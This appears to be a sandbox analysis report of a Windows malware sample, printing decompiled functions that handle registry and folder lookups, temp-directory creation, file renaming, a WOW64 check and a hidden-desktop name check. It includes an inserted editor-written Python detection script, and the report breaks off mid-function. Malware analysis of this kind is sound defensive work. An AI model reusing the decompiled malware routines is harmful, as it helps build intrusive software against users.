    • CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041A8C1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CharCountTickUpper
    • String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
    • API String ID: 2674899715-3410450461
    • Opcode ID: 6540bdb674bdbd286cf54d029022337dd09c51dab91e80d2168f21fba79854ec
    • Instruction ID: dbe99f03874a583f86b0181fa373edaf536889b9665c9f8a8753ce4936bc99d4
    • Opcode Fuzzy Hash: 6540bdb674bdbd286cf54d029022337dd09c51dab91e80d2168f21fba79854ec
    • Instruction Fuzzy Hash: 8E319F75D012199BDB11AFA9C4452FEBBB0FF40314F14846BD815AB281D378DED2CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E004138CA(void* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v52;
    				char _v76;
    				char _v116;
    				char _v636;
    				short _v1156;
    				void* __edi;
    				void* __esi;
    				void* _t29;
    				void* _t31;
    				void* _t36;
    				void* _t40;
    				char* _t43;
    				void* _t53;
    				char* _t56;
    				WCHAR* _t57;
    				char* _t62;
    				signed int _t63;
    				void* _t64;
    				intOrPtr _t73;
    
    				_t56 = __edx;
    				_t53 = __ecx;
    				E004164D4( &_v12,  &_v12, 0, 8);
    				_t29 = 0x60;
    				E004159A4(_t29,  &_v116);
    				_t31 = 0x61;
    				E004159A4(_t31,  &_v52);
    				_t57 =  &_v636;
    				_t36 = E0041A545(0x80000002, _t53, _t57,  &_v116,  &_v52, 0x104);
    				if(_t36 != 0xffffffff) {
    					_t67 = _t36;
    					if(_t36 > 0) {
    						ExpandEnvironmentStringsW(_t57,  &_v1156, 0x104);
    						E00413682(_t67,  &_v1156,  &_v12);
    					}
    				}
    				if(_v8 != 0) {
    					L10:
    					if(_t73 <= 0) {
    						return E00416421(_v12);
    					}
    					_push(0xcb);
    					return E0041252D(_t56, _v12, 0x63);
    				} else {
    					_t62 =  &_v76;
    					_t40 = 0x62;
    					E004159A4(_t40, _t62);
    					_v28 = 0x23;
    					_v24 = 0x1a;
    					_v20 = 0x26;
    					_v16 = _t62;
    					_t63 = 0;
    					do {
    						_t43 =  &_v636;
    						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t64 + _t63 * 4 - 0x18)), 0, 0, _t43);
    						if(_t43 == 0) {
    							_push(0);
    							_push(0);
    							_push(0);
    							_push( &_v12);
    							_push(E004136DC);
    							_push(2);
    							_push(1);
    							_t56 =  &_v16;
    							 *0x81 =  *0x81 + 0x81;
    						}
    						_t63 = _t63 + 1;
    					} while (_t63 < 3);
    					_t73 = _v8;
    					goto L10;
    				}
    			}

    APIs
      • Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041392C
    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041397C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: EnvironmentExpandFolderOpenPathStrings
    • String ID: #$&
    • API String ID: 1994525040-3870246384
    • Opcode ID: d8e2424e081960f82d0f23edba3179dabd47d907a06cd812ecb15dd56c8aeb1c
    • Instruction ID: 44e02bb72e26bb9da9856e8fe2745df04b1117a493af1ea52819b976b7576cc5
    • Opcode Fuzzy Hash: d8e2424e081960f82d0f23edba3179dabd47d907a06cd812ecb15dd56c8aeb1c
    • Instruction Fuzzy Hash: DC3173F2D10218BADF10AFA0DC89EDE777CEB44718F10456BB604F7181D6B85B858B99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0041417A(void* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v44;
    				char _v68;
    				char _v120;
    				char _v644;
    				short _v1164;
    				void* __edi;
    				void* __esi;
    				void* _t28;
    				void* _t30;
    				void* _t35;
    				void* _t39;
    				char* _t42;
    				void* _t52;
    				WCHAR* _t55;
    				char* _t60;
    				signed int _t61;
    				void* _t62;
    				intOrPtr _t70;
    
    				_t54 = __edx;
    				_t52 = __ecx;
    				E004164D4( &_v12,  &_v12, 0, 8);
    				_t28 = 0x77;
    				E004159A4(_t28,  &_v120);
    				_t30 = 0x78;
    				E004159A4(_t30,  &_v44);
    				_t55 =  &_v644;
    				_t35 = E0041A545(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
    				if(_t35 != 0xffffffff) {
    					_t65 = _t35;
    					if(_t35 > 0) {
    						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
    						E00413F1D(_t65,  &_v1164,  &_v12);
    					}
    				}
    				if(_v8 != 0) {
    					L9:
    					if(_t70 <= 0) {
    						return E00416421(_v12);
    					}
    					_push(0xcb);
    					return E0041252D(_t54, _v12, 0x7a);
    				} else {
    					_t60 =  &_v68;
    					_t39 = 0x79;
    					E004159A4(_t39, _t60);
    					_v28 = 0x1a;
    					_v24 = 0x26;
    					_v20 = 0x23;
    					_v16 = _t60;
    					_t61 = 0;
    					do {
    						_t42 =  &_v644;
    						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
    						_t68 = _t42;
    						if(_t42 == 0) {
    							_t54 =  &_v16;
    							E0041BB58( &_v644,  &_v16, _t68, 1, 2, E00413F55,  &_v12, 0, 0, 0);
    						}
    						_t61 = _t61 + 1;
    					} while (_t61 < 3);
    					_t70 = _v8;
    					goto L9;
    				}
    			}

    Address column: 0x0041417a to 0x00414274

    APIs
      • Part of subcall function 0041A545: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040754A,?,?,00000104,.exe,00000000), ref: 0041A55A
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 004141DC
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0041422C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: EnvironmentExpandFolderOpenPathStrings
    • String ID: #$&
    • API String ID: 1994525040-3870246384
    • Opcode ID: a5f55d67a6dff510097ce2e3116c4094a6fb5cd7b58e29bceb8589e112cff7b7
    • Instruction ID: 823bad2d37f11c272cbf2df305b4265e83d01467f0fc50182dc5f642cf022d4f
    • Opcode Fuzzy Hash: a5f55d67a6dff510097ce2e3116c4094a6fb5cd7b58e29bceb8589e112cff7b7
    • Instruction Fuzzy Hash: 1E3171B2D00218BADF10EBE19C89EDE777CEB44318F10446AF604F7180D6789EC98BA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E0041B82F(WCHAR* _a4) {
    				short _v524;
    				char _v1044;
    				void* __edi;
    				void* _t11;
    				void* _t19;
    				void* _t20;
    
    				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
    					L6:
    					return 0;
    				}
    				_t19 = 0;
    				while(1) {
    					_push(E0041775A());
    					_push(L"tmp");
    					_t18 =  &_v1044;
    					_t11 = E00417114(_t10, 0x104,  &_v1044, L"%s%08x");
    					_t20 = _t20 + 0xc;
    					if(_t11 == 0xffffffff) {
    						goto L6;
    					}
    					if(E0041BCB4(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
    						_t19 = _t19 + 1;
    						if(_t19 < 0x64) {
    							continue;
    						}
    						goto L6;
    					} else {
    						return 1;
    					}
    				}
    				goto L6;
    			}

    Address column: 0x0041b852 to 0x0041b8b0

    APIs
    • GetTempPathW.KERNEL32(000000F6,?,00000000,?), ref: 0041B846
      • Part of subcall function 0041775A: GetTickCount.KERNEL32 ref: 0041775A
      • Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3
    • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0041B898
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$CombineCountCreateDirectoryTempTick
    • String ID: %s%08x$tmp
    • API String ID: 1218007593-1196434543
    • Opcode ID: f527f1cec726aa347a7fc75e5943a88115c420c301e6ba5d9f3b75eb45fd84b0
    • Instruction ID: 0d7f81fb66a95d0b1df1bce088475a7dbc2741f56f684ad01be340aae66e29ed
    • Opcode Fuzzy Hash: f527f1cec726aa347a7fc75e5943a88115c420c301e6ba5d9f3b75eb45fd84b0
    • Instruction Fuzzy Hash: 23F0FFB11042282AEA207A309D46BEFB76CDF45B54F100132FE19A61E1D3799EC696EC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00404C88(WCHAR* __ebx) {
    				void* __edi;
    				void* __esi;
    				long _t5;
    				WCHAR* _t14;
    				void* _t15;
    				void* _t26;
    				void* _t27;
    
    				_t14 = __ebx;
    				if( *0x4223a8 == 0) {
    					E00406AB8(_t15, 0x4223a8, 0x4225b0, 2);
    					 *((short*)(E0041645D(0x4225b0, 0x4223a8, E00416F70(0x4223a8) + _t11) + 0x4225b0)) = 0;
    					_t5 = PathRemoveFileSpecW(0x4225b0);
    					 *((intOrPtr*)(_t26 - 0x7ce78b25)) =  *((intOrPtr*)(_t26 - 0x7ce78b25)) + _t5;
    				}
    				if(_t14 != 0) {
    					E004167C2(_t5 | 0xffffffff, 0x4223a8, _t14);
    					_t5 = PathRenameExtensionW(_t14, L".tmp");
    				}
    				if( *((char*)(_t27 + 0xc)) != 0 &&  *0x422bac > 1) {
    					E0041BA36(0x4225b0);
    					E00419AA2(0x4225b0);
    					_t5 = GetFileAttributesW(0x4223a8);
    					if(_t5 != 0xffffffff) {
    						_t5 = E00419AA2(0x4223a8);
    					}
    				}
    				return _t5;
    			}

    Address column: 0x00404c88 to 0x00404d12

    APIs
    • PathRemoveFileSpecW.SHLWAPI(004225B0,004225B0,004223A8,00000000,00000002,?,?,004052E0,00000000,?,00000000,000003FC,?,?,00000102), ref: 00404CC0
    • PathRenameExtensionW.SHLWAPI(?,.tmp,?,?,004052E0,00000000,?,00000000,000003FC,?,?,00000102), ref: 00404CDC
    • GetFileAttributesW.KERNEL32(004223A8,004225B0,004225B0,?,?,004052E0,00000000,?,00000000,000003FC,?,?,00000102), ref: 00404CFF
      • Part of subcall function 00406AB8: PathRenameExtensionW.SHLWAPI(?,.dat,?,004229A0,00000032,77E49EB0,?,00000000), ref: 00406B33
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$ExtensionFileRename$AttributesRemoveSpec
    • String ID: .tmp
    • API String ID: 3627892477-2986845003
    • Opcode ID: 330d4d01a699f64eae04223d854e8781d7d4851c119fe0605637dc957a11a35d
    • Instruction ID: ece40d87d2c004f753ce4a39d82ac4b529a438e7cfb1bec1fe12c546555d8b6b
    • Opcode Fuzzy Hash: 330d4d01a699f64eae04223d854e8781d7d4851c119fe0605637dc957a11a35d
    • Instruction Fuzzy Hash: F0F08F70B002503AE32177366D49BAF15595FC2724B95853FF925B12F2DBBC48C6426D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00408490(void* __edx) {
    				long _v8;
    				char _v116;
    				void _v220;
    				void* __esi;
    				void* _t8;
    				void* _t12;
    				void* _t18;
    
    				_t18 = __edx;
    				_t8 = GetThreadDesktop(GetCurrentThreadId());
    				if(_t8 != 0) {
    					_t8 = GetUserObjectInformationW(_t8, 2,  &_v220, 0x64,  &_v8);
    					if(_t8 != 0 && _v8 == 0x4e) {
    						E00406762(0x2937498d,  &_v116, 0);
    						_t8 = E00416492( &_v116,  &_v220, 0x4c);
    						if(_t8 == 0) {
    							_t12 = E0040809E( &_v220, _t18, 0x422e10, _t8);
    							if(_t12 == 0) {
    								return E00408309(0x422e10, 0);
    							}
    							 *0x422940 =  *0x422940 | 0x00000004;
    							return _t12;
    						}
    					}
    				}
    				return _t8;
    			}

    Address column: 0x00408490 to 0x00408512

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 0040849A
    • GetThreadDesktop.USER32(00000000), ref: 004084A1
    • GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,)c@), ref: 004084BB
      • Part of subcall function 0040809E: TlsAlloc.KERNEL32(00422E10,00000000,0000018C,00000000,00000000), ref: 004080B7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread$AllocCurrentDesktopInformationObjectUser
    • String ID: )c@
    • API String ID: 454308152-4040285577
    • Opcode ID: c6a80911e517e44bf578fb4346c602f4abe083668f2bd4c22ee71150e26b2bba
    • Instruction ID: a6b98ba24c0066dad2441e561bc5f2bc0ea09214408938c77a85bf2653028566
    • Opcode Fuzzy Hash: c6a80911e517e44bf578fb4346c602f4abe083668f2bd4c22ee71150e26b2bba
    • Instruction Fuzzy Hash: 230148706006147AEF10ABB19F45F9A326C6B40708F40407EF545B21D2EF79AE45866D
    Uniqueness

    Uniqueness Score: -1.00%
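Added example for E00408490 above; this is editor-written code, not part of the report and not the sample's own code. The function resolves the calling thread's desktop with GetThreadDesktop(GetCurrentThreadId()), reads its name through GetUserObjectInformationW with nIndex 2 (UOI_NAME) into a 0x64-byte buffer, and only proceeds when the returned length is exactly 0x4E bytes and the first 0x4C bytes equal a string decoded at runtime by E00406762, i.e. the expected desktop name is 38 UTF-16 characters long; the decompile does not reveal the name itself. The code below reproduces that lookup with ctypes and adds the check a responder would run on the host: enumerate every desktop in the process window station with EnumDesktopsW and report any name outside a baseline. The baseline set, the function names and the 256-character buffer are this example's assumptions; the Windows calls only execute on Windows, the filtering logic runs anywhere.

```python
import sys
from typing import Iterable, List

# Desktops normally present in an interactive window station (assumed baseline,
# not taken from the report). Anything else deserves a look.
EXPECTED_DESKTOPS = {"default", "winlogon", "disconnect", "screen-saver"}

UOI_NAME = 2                          # nIndex used by the sample at 004084BB
EXPECTED_NAME_CHARS = 0x4E // 2 - 1   # 0x4E bytes incl. terminator -> 38 chars


def unexpected_desktops(names: Iterable[str]) -> List[str]:
    """Return desktop names that are not part of the baseline, case-insensitively."""
    return sorted({n for n in names if n.lower() not in EXPECTED_DESKTOPS})


def has_expected_name_length(name: str) -> bool:
    """True when a name has the length the sample's compare at 004084E6 requires."""
    return len(name) == EXPECTED_NAME_CHARS


def _user32():
    if sys.platform != "win32":
        raise OSError("desktop APIs are only available on Windows")
    import ctypes
    from ctypes import wintypes
    u = ctypes.WinDLL("user32", use_last_error=True)
    u.GetProcessWindowStation.restype = wintypes.HWINSTA
    u.GetThreadDesktop.argtypes = (wintypes.DWORD,)
    u.GetThreadDesktop.restype = wintypes.HDESK
    u.GetUserObjectInformationW.argtypes = (wintypes.HANDLE, ctypes.c_int, ctypes.c_void_p,
                                            wintypes.DWORD, ctypes.POINTER(wintypes.DWORD))
    u.GetUserObjectInformationW.restype = wintypes.BOOL
    return ctypes, wintypes, u


def current_desktop_name() -> str:
    """Same lookup as E00408490: name of the desktop the calling thread is attached to."""
    ctypes, wintypes, u = _user32()
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.GetCurrentThreadId.restype = wintypes.DWORD
    hdesk = u.GetThreadDesktop(kernel32.GetCurrentThreadId())
    if not hdesk:
        raise ctypes.WinError(ctypes.get_last_error())
    buf = ctypes.create_unicode_buffer(256)   # the sample uses 0x64 bytes; size is our choice
    needed = wintypes.DWORD(0)
    if not u.GetUserObjectInformationW(hdesk, UOI_NAME, buf, ctypes.sizeof(buf),
                                       ctypes.byref(needed)):
        raise ctypes.WinError(ctypes.get_last_error())
    return buf.value


def enumerate_desktops() -> List[str]:
    """All desktops in the process window station, collected via EnumDesktopsW."""
    ctypes, wintypes, u = _user32()
    DESKTOPENUMPROCW = ctypes.WINFUNCTYPE(wintypes.BOOL, wintypes.LPWSTR, wintypes.LPARAM)
    u.EnumDesktopsW.argtypes = (wintypes.HWINSTA, DESKTOPENUMPROCW, wintypes.LPARAM)
    u.EnumDesktopsW.restype = wintypes.BOOL
    found: List[str] = []

    @DESKTOPENUMPROCW
    def collect(name, _lparam):
        found.append(name)
        return True

    if not u.EnumDesktopsW(u.GetProcessWindowStation(), collect, 0):
        raise ctypes.WinError(ctypes.get_last_error())
    return found


if __name__ == "__main__":
    names = enumerate_desktops()
    print("current desktop:", current_desktop_name())
    print("all desktops   :", names)
    print("unexpected     :", unexpected_desktops(names))
```

A hidden desktop created by this kind of sample only shows up in the window station of the session it runs in, so run the enumeration in that session (and as the same user) rather than from a remote shell in session 0.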

    C-Code - Quality: 100%
    			E0041BA36(WCHAR* _a4) {
    				signed int _t4;
    				short _t9;
    				signed short _t10;
    				WCHAR* _t11;
    				WCHAR* _t12;
    				int _t18;
    
    				_t12 = _a4;
    				_t9 = 0;
    				_t11 = PathSkipRootW(_t12);
    				if(_t11 == 0) {
    					_t11 = _t12;
    				}
    				while(1) {
    					_t4 =  *_t11 & 0x0000ffff;
    					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
    						goto L5;
    					}
    					L11:
    					_t11 =  &(_t11[1]);
    					continue;
    					L5:
    					_t10 = _t4;
    					 *_t11 = 0;
    					if(GetFileAttributesW(_t12) == 0xffffffff) {
    						_t18 = CreateDirectoryW(_t12, 0);
    					}
    					if(_t18 == 0) {
    						L13:
    						return _t9;
    					} else {
    						if(_t10 == 0) {
    							_t9 = 1;
    							goto L13;
    						}
    						 *_t11 = _t10;
    						goto L11;
    					}
    				}
    			}

    Address column: 0x0041ba38 to 0x0041ba9a

    APIs
    • PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0040F046,?,?,?,?,?), ref: 0041BA41
    • GetFileAttributesW.KERNEL32(?,?,00000000,0040F046,?,?,?,?,?), ref: 0041BA69
    • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0040F046,?,?,?,?,?), ref: 0041BA77
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AttributesCreateDirectoryFilePathRootSkip
    • String ID: .exe
    • API String ID: 4231520044-4119554291
    • Opcode ID: 77f197e7d8d0df5ce09041799e73a062751f3542ff805b08db4af2bb0a526ee4
    • Instruction ID: 50c40f898219108e62a7147446040111ec88b0314f17285aba8ba2409b8ae035
    • Opcode Fuzzy Hash: 77f197e7d8d0df5ce09041799e73a062751f3542ff805b08db4af2bb0a526ee4
    • Instruction Fuzzy Hash: 14F0F6315C13115AC7301E2A48486E7B398DE01BE1B6A1A2BECD0E7770D739ACC192EC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417C28(void* __ecx) {
    				signed int _v8;
    				struct HINSTANCE__* _t7;
    
    				_v8 = _v8 & 0x00000000;
    				_t7 = GetModuleHandleW(L"kernel32.dll");
    				if(_t7 == 0) {
    					L4:
    					return _t7 & 0xffffff00 | _v8 != 0x00000000;
    				} else {
    					_t7 = GetProcAddress(_t7, "IsWow64Process");
    					if(_t7 == 0) {
    						goto L4;
    					} else {
    						_t7 = _t7->i(0xffffffff,  &_v8);
    						if(_t7 != 0) {
    							goto L4;
    						} else {
    							return 0;
    						}
    					}
    				}
    			}

    Address column: 0x00417c2c to 0x00417c67

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040605C,00000000,00406583), ref: 00417C35
    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00417C45
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: IsWow64Process$kernel32.dll
    • API String ID: 1646373207-3024904723
    • Opcode ID: 1e1ccda3af9c76576ecb9dc05f46b47a7bd1e27024f96bc0a03e168f2e637909
    • Instruction ID: bc99cfb7de9887e9f8ebd36b980b5f91688a883b7dee8070f2601d2cfaf11cef
    • Opcode Fuzzy Hash: 1e1ccda3af9c76576ecb9dc05f46b47a7bd1e27024f96bc0a03e168f2e637909
    • Instruction Fuzzy Hash: C9E04F71308206B7DF0497A18D0AB9B33A89B417D9F2002A9A111F20D1FAB8DA44966C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00411735(intOrPtr _a4, intOrPtr _a12) {
    				void* __esi;
    				void* _t6;
    				signed int _t7;
    
    				if(_a12 == 0x64 || _a12 == 0x33) {
    					EnterCriticalSection(0x4230dc);
    					_t7 = E004110FC(_a4);
    					if(_t7 != 0xffffffff) {
    						_t7 = SetEvent( *(_t7 * 0x24 +  *0x4230f4 + 4));
    					}
    					LeaveCriticalSection(0x4230dc);
    					return _t7;
    				}
    				return _t6;
    			}

    Address column: 0x0041173a to 0x0041177b

    APIs
    • EnterCriticalSection.KERNEL32(004230DC), ref: 0041174B
    • SetEvent.KERNEL32(?), ref: 0041176C
    • LeaveCriticalSection.KERNEL32(004230DC), ref: 00411773
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterEventLeave
    • String ID: 3
    • API String ID: 3094578987-1842515611
    • Opcode ID: 497b0d9035bf837987d528813f9f840c99541d1a32d12e62e96f63e81b13ad32
    • Instruction ID: d4a5d71a9a050570df3702cbbba11139207db9d1f7b6426585737e9d93d6d478
    • Opcode Fuzzy Hash: 497b0d9035bf837987d528813f9f840c99541d1a32d12e62e96f63e81b13ad32
    • Instruction Fuzzy Hash: 31E09B31104100DFC7145B25ED4989B7B74EBD5332B00C53EF625A72B0C7388982CF15
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E0040FB3F(void* __edx, intOrPtr _a4) {
    				signed int _v12;
    				int _v16;
    				void* _v20;
    				int _v24;
    				signed int _v28;
    				int _v32;
    				char _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				signed int _v52;
    				intOrPtr _v56;
    				signed int _v60;
    				signed int _v64;
    				intOrPtr _v74;
    				intOrPtr _v78;
    				char _v80;
    				struct _SYSTEMTIME _v96;
    				char _v112;
    				short _v184;
    				short _v288;
    				void* __ebx;
    				void* __esi;
    				signed int _t127;
    				signed int _t131;
    				signed int _t132;
    				signed int _t133;
    				signed int _t134;
    				signed int _t140;
    				signed int _t142;
    				signed int _t143;
    				signed int _t151;
    				signed int _t155;
    				signed int _t159;
    				signed char _t163;
    				signed int _t167;
    				signed int _t176;
    				signed int _t177;
    				signed int _t186;
    				long _t191;
    				long _t195;
    				signed int _t201;
    				void* _t202;
    				signed int _t203;
    				signed int _t208;
    				signed int _t211;
    				signed int _t212;
    				signed int _t219;
    				short* _t230;
    				signed int _t238;
    				intOrPtr _t239;
    				void* _t244;
    
    				_t239 = _a4;
    				_t126 =  *((intOrPtr*)(_t239 + 0x40));
    				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
    					_t127 = E0041BF9B( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
    					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
    					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
    					_t238 = _t127;
    					_v64 = _t238;
    					__eflags = _t238;
    					if(_t238 == 0) {
    						L55:
    						E00416421(_v64);
    						__eflags = 0 -  *(_t239 + 0x3c);
    						asm("sbb eax, eax");
    						return  ~0x00000000;
    					}
    					_t131 = _v12;
    					__eflags = _t131 - 0x10;
    					if(_t131 <= 0x10) {
    						goto L55;
    					}
    					__eflags =  *((char*)(_t239 + 0x18)) - 1;
    					_v16 = 1;
    					_t132 = _t131 + _t238;
    					__eflags = _t132;
    					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
    					_v12 = _t132;
    					while(1) {
    						_t133 =  *(_t238 + 2) & 0x0000ffff;
    						__eflags = _t133 - 0x10;
    						if(_t133 < 0x10) {
    							goto L55;
    						}
    						_t219 =  *(_t238 + 4) & 0x0000ffff;
    						__eflags = _t219 - _t133;
    						if(_t219 >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 6) - _t133;
    						if( *(_t238 + 6) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 8) - _t133;
    						if( *(_t238 + 8) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xa) - _t133;
    						if( *(_t238 + 0xa) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xc) - _t133;
    						if( *(_t238 + 0xc) >= _t133) {
    							goto L55;
    						}
    						__eflags =  *(_t238 + 0xe) - _t133;
    						if( *(_t238 + 0xe) >= _t133) {
    							goto L55;
    						}
    						_t134 =  *_t238 & 0x0000ffff;
    						_t208 = _t134 >> 0x00000009 & 0x00000008;
    						_t220 = _t238 + _t219;
    						__eflags = (_t134 & _v28) - _v28;
    						if((_t134 & _v28) != _v28) {
    							L48:
    							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
    							_t102 = _t238 + 0x10; // 0x10
    							__eflags = _t102 - _v12;
    							if(_t102 > _v12) {
    								goto L55;
    							}
    							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
    							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
    								goto L55;
    							}
    							_v16 = _v16 + 1;
    							continue;
    						}
    						_t234 = _t208;
    						_t140 = E0040F81C(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
    						__eflags = _t140;
    						if(_t140 == 0) {
    							goto L48;
    						}
    						_t141 =  *(_t239 + 0x44);
    						__eflags =  *(_t239 + 0x44);
    						if(__eflags == 0) {
    							L16:
    							_t142 =  *(_t238 + 8) & 0x0000ffff;
    							__eflags = _t142;
    							if(_t142 == 0) {
    								L18:
    								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
    								__eflags = _t143;
    								if(_t143 == 0) {
    									L20:
    									__eflags =  *_t238 & 0x00000010;
    									if(( *_t238 & 0x00000010) == 0) {
    										L31:
    										E004164D4( &_v60,  &_v60, 0, 0x1c);
    										_v60 =  *_t238 & 0x0000ffff;
    										_t209 = _t208 | 0xffffffff;
    										_v56 = E0041687F(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
    										_t151 =  *(_t238 + 6) & 0x0000ffff;
    										__eflags = _t151;
    										if(_t151 != 0) {
    											__eflags = _t151 + _t238;
    											_v52 = E0041687F(_t209, _t151 + _t238);
    										} else {
    											_v52 = _v52 & 0x00000000;
    										}
